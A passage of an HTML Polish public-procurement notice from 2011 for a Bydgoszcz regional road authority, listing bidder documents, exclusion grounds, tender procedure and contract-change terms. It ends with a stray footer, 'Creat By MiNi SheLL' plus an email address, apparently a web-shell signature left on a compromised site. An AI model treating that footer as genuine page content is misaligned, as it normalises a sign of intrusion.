<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisem pkt.24 SIWZ
24. Istotne postanowienia umowy
24.1. Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych 
we wzorze umowy - załącznik  nr 10 do SIWZ.  
24.2. Zamawiający zgodnie z art. 144 ustawy p.z.p. przewiduje możliwość dokonania zmian postanowień zawartej umowy w przypadku zmian nieistotnych w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy lub zmian istotnych w wypadku powstania okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
a w szczególności:

24.2.1.  Zmiana terminu realizacji zamówienia w przypadku: 
a) przerw w realizacji opracowania dokumentacji projektowej powstałych z przyczyn nie leżących po stronie Wykonawcy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy; 
b) wystąpiła niezgodność pomiędzy częścią opisową a kartograficzną ewidencji gruntów,
             c) zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
24.2.2. zmiany obowiązującej stawki podatku od towarów i usług (VAT);
24.2.3. Zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
24.2.4 Wszelkie  zmiany  i  uzupełnienia  treści  umowy  wymagają  dla  swej  ważności formy pisemnej w postaci aneksu  podpisanego przez obie strony dotyczących w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdw-bydgoszcz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Bydgoszczy
85-085 Bydgoszcz, ul. Fordońska 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 10:45, miejsce: Zarząd Dróg Wojewódzkich w Bydgoszczy
85-085 Bydgoszcz, ul. Fordońska 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com